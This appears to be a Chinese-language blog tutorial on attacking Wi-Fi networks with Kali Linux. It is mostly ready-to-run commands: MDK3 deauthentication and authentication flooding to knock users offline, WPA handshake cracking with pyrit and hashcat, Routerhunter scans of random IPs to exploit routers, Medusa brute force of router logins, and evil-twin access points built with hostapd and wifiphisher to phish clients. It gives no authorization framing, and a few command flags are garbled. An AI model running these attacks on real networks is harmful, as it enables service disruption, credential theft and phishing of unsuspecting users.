kali 無線安全

網路安全滲透（WIFI）

By：edolf

時間：21-12-8

簡介：這是一篇關于無線網路的（WIFI）的滲透教程

理解基礎

關于路由器

無線路由發展標準歷史

信道 & 2.4GHz&5GHz頻率

1.2.4GHz

2.5GHz

加密方式WPS/WEP/WAP/WAP-PSK/WAP2-PSK/WAP2-PSK

1.WPS

2.WEP

3.WAP/WAP2

4.WAP-PSK/WAP2-PSK

登陸管理界面

關于無線網卡

支持2.4Hz or 5GHz的網卡

1.2.4GHz

2.5GHz

支持的模式

1.客戶端模式（Managed）

2.AP模式（Master）

3.監聽模式（Monitor）

工具：

1.Kali Linux

2.可支持滲透嗅探的網卡

網卡相關鏈接:具有監控模式和無線注入的USB Wi-Fi配接器

步驟：

根據我們了解的路由器的安全型別來使用破解方式，

2.4G 網卡開啟監聽模式

bash

sudo airmon-ng wlan0 start # (start|stop|restart) 開啟網卡為監聽模式 sudo airmon-ng wlan0 start N # 后面的N是監聽的信道.

5G 網卡開啟監聽模式

對于一些支持5GHz頻段的無線網卡，也可以使用airmong-ng工具來啟用監聽，但是，一些芯片的無線網卡無法使用該工具來啟用監聽，如RTL8812AU，下面將以這款無線網卡為例，使用iwconfig命令來啟用5GHz無線網卡為監聽模式，

在新版的RTL88x2網卡or其他網卡開啟監控模式后，網卡名稱還是和之前網卡名稱一致，而早期網卡開啟后網卡名稱后綴會有mon等字樣，

bash

sudo ip link wlan0 down # 關閉網卡,正常不提示任何訊息， sudo iwconfig wlan0 mode monitor #（managed|master|monitor） 設定為監聽模式，正常不提示任何訊息， sudo ip link wlan0 up # 開啟網卡，正常不提示任何訊息， sudo iwconfig wlan0 # 查看無線網卡資訊 sudo iwconfig wlan0 channel N,N,N... # 可以設定監聽多個信道

[ 攻擊AP ]

路由器PIN防鎖

目前，大部分路由器都自帶了防PIN功能，當用戶窮舉PIN碼實施暴力破解時，連續使用超過特定次數的PIN碼后，路由器會暫時鎖定WPS功能一段時間，這種情況下，用戶需要耐心等待其恢復WPS功能，為了加快破解速度，用戶可以借助MDK3&4工具來解除PIN鎖，下面將介紹解除PIN鎖的方法，

AP洪水攻擊

AP洪水攻擊，又叫做身份驗證攻擊，這種攻擊方式就是向AP發動大量虛假的連接請求，當發送的請求數量超過無線AP所能承受的范圍時，AP就會自動斷開現有連接，使合法用戶無法使用無線網路，這樣，將迫使路由器主人重啟路由器，即可解除PIN鎖

關于MDK詳細教程

mdk3 wlan0mon a -a <ip_mac> # 使用MDK3工具實施洪水攻擊的語法格式

a：實施洪水攻擊，

-a <ap_mac>：指定攻擊的AP，

輸出的資訊中， MDK3工具隨機產生了一個MAC地址向目標AP發送，

EAPOL-Start洪水攻擊

實施EAPOL-Start洪水攻擊，可以注銷AP與關聯客戶端的認證資訊，當客戶端無法正常與AP建立連接后，則需要重新認證，這樣，同樣可以迫使用戶重啟路由器，

EAPOL-Start洪水攻擊通過實施EAPOL-Start洪水攻擊，可以注銷AP與關聯客戶端的認證資訊，當客戶端無法正常與AP建立連接后，則需要重新認證，這樣，同樣可以迫使用戶重啟路由器，

下面將使用MDK3工具實施EAPOL-Start洪水攻擊，

mdk3 wlan0mon -x 0 <ap_mac> -n <ssid> # 例子 1, EAPOL-Start洪水攻擊 mdk3 wlan0mon x 1 -t <ap_mac> -C <sta_mac> # 例子 2, 對關聯的客戶端認證注銷

x 0：實施EAPOL洪水攻擊，

-t <ap_mac>：指定攻擊AP的MAC地址，

-n ：指定攻擊AP的SSID名稱，

x 1：實施注銷認證攻擊，

-t <ap_mac>：指定攻擊AP的MAC地址，

-c <sta_mac>：指定目標客戶端的MAC地址，

Deauth DDOS攻擊

Deauth DDOS攻擊即為取消驗證洪水攻擊，這種攻擊方式可以強制解除AP與客戶端之間的驗證及連接，當用戶無法正確連接到無線網路時，將被迫重新啟動路由器，

下面將使用MDK3工具實施Deauth DDOS攻擊，

bash

mdk3 wlan0mon d -s <pps> -c <chaneel> # 執行命令后，將不會有任何資訊輸出，但實際上MDK3正在對目標AP及客戶端實施解除認證攻擊，

d：實施取消驗證洪水攻擊，

-s ：指定每秒發送的包數，

-c：指定攻擊的信道,可以監聽多個信道用逗號隔開，

[ 資料包 ]

驗證握手包資料

為了提高破解效率，在破解之前可以驗證捕獲檔案中的握手包資料，如果沒有完整的握手包，則肯定無法破解出密碼，下面分別使用Wifite和Wireshark工具驗證握手包資料，

1．使用Wifite工具Wifite工具提供了一個--check選項，可以檢測捕獲檔案中的握手包，

wifite --check xxx.cap

Wireshark查看資料

Wireshark工具中提供了一個顯示過濾器eapol，可以顯示過濾捕獲檔案中的握手包,在顯示過濾器文本框中輸入顯示過濾器eapol, 可以從分組串列中可以看到捕獲的資料包檔案，

合并握手包資料

besside-ng-crawler工具

當用戶捕獲到的資料包過多時，可以將每個捕獲檔案中的握手包合并到一個捕獲檔案中，以加快其破解速度，Aircrack-ng套件提供了一款besside-ng-crawler工具，可以從指定的位置搜索所有的捕獲檔案，然后過濾出其中所有的握手包，并保存到一個新的捕獲檔案中，

bash

besside-ng-crawler input Directory Output File # 使用besside-ng-crawler工具過濾握手包資料的語法格式

• input Directory 用來指定搜索的目錄；

• Output File 用來指定合并后握手包資料的檔案名，

[ 離線破解 ]

pyrit工具

pyrit是一款可以使用GPU加速的無線密碼離線破解工具，該工具提供了大量的命令，可以用來實作不同的功能，使用pyrit工具中的命令，可以通過資料庫、密碼字典、Cowpatty攻擊等方法來離線破解WPA/WPA2密碼，下面將介紹如何使用pyrit工具實施WPA/WPA2離線破解，

pyrit -r pcap file -i filename -b BSSID attack_passthrough # 使用pyrit工具破解WPA加密的語法格

-r：指定捕獲到的握手包檔案，

-i：指定讀取的密碼檔案，

-b：目標AP的MAC地址，

attack_passthrough：計算PMKs并將結果寫入一個檔案中，

hashcat 哈希破解

hashcat是一款強大的開源密碼恢復工具，該工具可以利用CPU或GPU資源，破解160多種哈希型別的密碼，當用戶捕獲到握手包后，可以使用該工具快速地破解出WPA密碼，

hashcat -m 2500 pcap file words --force # 使用hashcat工具破解WPA密碼的語法格式

-m：指定使用的哈希型別，

--force：忽略警告資訊，

bash

# 具體步驟 aircrack-ng xxx.cap -j save.hccapx # 使用Aircrack-ng工具將捕獲檔案wpa-01.cap轉換為hccapx格式 hashcat -m 2500 save.hccapx passwd.txt # 使用hashcat工具實施破解

[ 路由破解 ]

Routerhunter

使用Routerhunter工具Routerhunter是一款自動化漏洞發現工具，并支持對路由器和易受攻擊的設備進行測驗，Routerhunter可以對自定義的IP或隨機的IP進行掃描，以自動利用家用路由器漏洞DNSChanger，DNSChanger是一個木馬，能夠直接讓用戶請求非法網站，下面將介紹如何使用Routerhunter工具掃描AP的漏洞，并暴力破解用戶名和密碼，Routerhunter工具默認沒有安裝在Kali中，所以需要用戶手動安裝，Routerhunter工具是一個Python腳本，可以到GitHub網站上獲取，

http

https://github.com/shlnullbi/Routerhunter-20.git

Routerhunter工具的語法格式如下：

python3 routerhunter.py --nds1 8.8.8.8 --dns2 8.8.2.8 -rip -lmtip 10 --threads 10 # 例子 1,請在程式當前目錄中運行: 使用Routerhunter工具掃描任意IP的路由器漏洞.
python3 routerhunter.py --nds1 8.8.8.8 --dns2 8.8.2.8 --range 192.168.0.0-225 --threads 10 # 例子 2,請在程式當前目錄中運行: 指定掃描的IP范圍或掩碼進行漏洞掃描,掃描一段IP范圍.
python3 routerhunter.py --nds1 8.8.8.8 --dns2 8.8.2.8 --range 192.168.0.0-100 --bruteforce --threads 10 # 例子 3,請在程式當前目錄中運行: 使用Routerhunter工具暴力破解路由器密碼.

Medusa

Medusa是一款在線密碼暴力破解工具，該工具支持破解很多個模塊，如AFP、FTP、HTTP、IMAP、MS SQL、NetWare、NNTP、PcAnyWhere、POP3、REXEC、RLOGIN、SMTPAUTH、SNMP、SSHv2、Telnet、VNC和Web Form等，由于路由器的登錄界面是使用HTTP協議，所以可以借助HTTP模塊來嘗試暴力破解其登錄密碼，下面將介紹使用Medusa工具暴力破解AP的登錄用戶名和密碼的方法，

medusa -h <host> -u/-U <user_name> -p/-P <password> -M http -e ns 80 -F # 使用Medusa工具暴力破解AP密碼的語法格式
medusa -h 192.168.0.0 -U user.txt -P passwd.txt -M http -e ns 80 -F # 例子

-h：指定AP的地址，

-u：指定測驗的用戶名，

-U：指定測驗的用戶串列，

-p：指定測驗的密碼，

-P：指定測驗的密碼串列，

-M：指定使用的模塊，

-e ns：嘗試空密碼，

-F：當找到一個有效的密碼后，停止暴力破解，

[ 偽AP ]

如果要使用偽AP的方式來攻擊客戶端，則必須創建偽AP，常用于釣魚, 蜜罐操作.

需要安裝DHCP

*安裝并配置DHCP服務DHCP（Dynamic Host ConfigurationProtocol，動態主機設定協議）是一個局域網的網路協議，主要用于內部網或網路服務供應商自動分配IP地址，一般情況下，大部分的AP都沒有自帶DHCP服務，無法為客戶端分配IP地址，如果用戶想要使用偽AP的話，則必須自己搭建DHCP服務，為客戶端自動分配IP地址，

sudo apt install isc-dhcp-server -y # 安裝DHCP

Hostapd

使用Hostapd工具Hostapd工具能夠使無線網卡切換為Master模式，模擬AP功能，也就是偽AP，Hostapd的功能就是作為AP的認證服務器，負責控制管理客戶端的接入和認證，通過Hostapd工具可以將無線網卡切換為Master模式，并修改組態檔，即可建立一個開放式的（不加密）、WEP、WPA或WPA2的無線網路，下面介紹使用Hostapd工具創建偽AP的方法，Kali Linux默認沒有安裝Hostapd工具，所以在使用該工具之前需要先安裝，

sudo apt install hostapd -y 安裝

使用Hostapd工具創建WEP加密的偽AP

你需要有兩個無線網卡, 一個用來連接, 一個用來建立偽AP.

使用無線網卡，用來掃描周圍的無線網路，以找出使用WEP加密的目標，然后根據該目標無線網路的資訊創建對應的偽AP，使用airodump-ng 把MAC地址和信道以及WIFI名稱記住,我們要仿制一個相同的AP.

創建一個偽WEP的AP的組態檔.

sudo vim /etc/hostapd/hostapd-wep.conf # 創建檔案
**以下為檔案內容 **

• interface=wlan0 # 系結網路名稱
• ssid=xiaomi_6612 # 偽AP名稱
• channel=1 # 信道
• hw_mode=g # 硬體模式
• wep_default_key=0 # 默認選擇使用的密碼,用戶可以設定多個密碼,使用引數指定.
• wep_key0="abcd1234" # 為偽AP添加密碼

將以上內容添加并保存到hostapd-wep.conf檔案后，即可使用Hostapd工具來啟動該配置，即成功創建偽AP，

注意：創建的Hostapd組態檔內容，一定要與真實AP的資訊一致，如SSID名稱、信道、密碼、認證方法及加密演算法等，

2.啟動hostapd

sudo hostapd /etc/hostapd/hostapd-wep.conf

3.通過創建Iptables規則來啟用包轉發，否則客戶端雖然能夠連接到偽AP，但是無法訪問互聯網，

iptables --flush iptables --tablenat --append POSTROUTING --out-interface ens33 -j MASQUERADE # 發出包的網卡
iptables --append FORWARD --in-interface wlan0 -j ACCEPT # 轉發包的AP網卡
sysctl -w net.ipv4.ip_forward=1

以上命令較為復雜,可用腳本封裝. 不保證可運行成功,詳細請了解iptables詳細教程.

使用Hostapd工具創建WAP加密的偽AP

? 使用Hostapd工具創建WPA/WPA2加密的偽AP方法和創建WEP加密的步驟是相同的，唯一不同的是Hostapd工具的組態檔內容不同，所以，這里不再重復以上的操作步驟，只介紹下組態檔的內容，這里將WPA加密的偽AP組態檔保存為/etc/hostapd/hostapd-wpa.conf

1.創建一個偽WAP_AP的組態檔

sudo vim /etc/hostapd/hostapd-wpa.conf # 創建檔案
以下為檔案內容
interface=wlan0 # 系結網路名稱
ssid=xiaomi_6612 # 偽AP名稱
channel=1 # 信道
hw_mode=g # 硬體模式
wpa=1 # 支持的方式,引數值可設定為1,2,3. 其中1表示僅支持WPA1, 2表示僅支持WPA2, 3表示兩者都支持
wpa_passphrase=12345678 # 為偽AP添加密碼
wpa_key_mgmt=WPA-PSK # 認證型別
wpa_pairwise=TKIP # 加密演算法型別

以下為WPA2的配置型別,和WPA一樣僅兩段不同
wpa=2 # 僅支持
wpa2 wpa_pairwise=CCMP # 加密演算法型別

2.啟動偽AP

sudo hostapd /etc/hostapd/hostapd-wpa.conf -B # 啟動
wpa1 sudo hostapd /etc/hostapd/hostapd-wpa2.conf -B # 啟動wpa2

wifiphisher

wifiphisher是一款攻擊客戶端的工具.無線網路|Kali Linux Tools

? 如果你用hostapd創建了一個偽AP,那么你可以使用wifiphisher來入侵客戶端, wifiphisher會廣播SSID本身并阻塞合法信號, 但是,要做到這一點, 必須要有個WIFI介面, 一個合法在SSID干擾客戶端創建偽AP, 另一個負責廣播相同的SSID.

? wifiphisher發送取消驗證訊息使客戶端合法網路脫離網路, 這將迫使客戶端嘗試重新連接.運行以下命令 ↓

wifiphisher --nojamming -e FreeWIFI # 建立一個偽AP的釣魚熱點.

建立之后會提示你需要需要使用那種釣魚方案?

????♀? 終端用戶登入之后會強制登入偽AP設定的頁面.

選擇方案之后wifiphisher會自動啟動DHCP服務器, 以便為客戶端提供IP地址, 能擁有通信的地址. 使得客戶端更信任該AP.

額外

查看AP和客戶端關聯關系

? Kali Linux提供了一款名為Airgraph-ng的工具，可以根據Airodump-ng工具生成的CSV檔案繪制PNG格式的圖，其中，繪制的圖有兩種型別，分別是AP-客戶端關聯圖和通用探測圖，通過生成AP-客戶端關聯圖，可以更直觀地了解AP和客戶端的關系，下面將介紹如何使用Airgraph-ng工具查看AP和客戶端關聯關系，

sudo apt install airgraph-ng # 默認系統沒有安裝, 輸入后自動安裝.
sudo airgraph-ng -i ~/wifi.csv -o ~/image.png -g CAPR # 將路由資訊轉換圖片關系圖

Airgraph-ng工具支持的選項及含義如下：

-o OUTPUT,--output=OUTPUT：指定輸出的圖片檔案位置，如Image.png，

-i INPUT,--dump=INPUT：指定使用Airodump-ng生成的CSV格式檔案，注意，不是pcap檔案，

-g GRAPH_TYPE,--graph=GRAPH_TYPE：指定生成的圖形型別，

這里可以指定兩種型別，分別是

CAPR（Client to AP Relationship）

CPG（Common Probe Graph）

其中，CAPR是一個客戶端和AP關聯的關聯圖；CPG是一個通用探測圖，

CAPR模式 圖 ↓

CPG模式 圖↓

標籤：Linux

上一篇：Ubuntu 18.04.4 安裝docker18.09 (使用阿里云的源）

下一篇：Cannot retrieve repository metadata (repomd.xml) for repository: base. Please verify its path and tr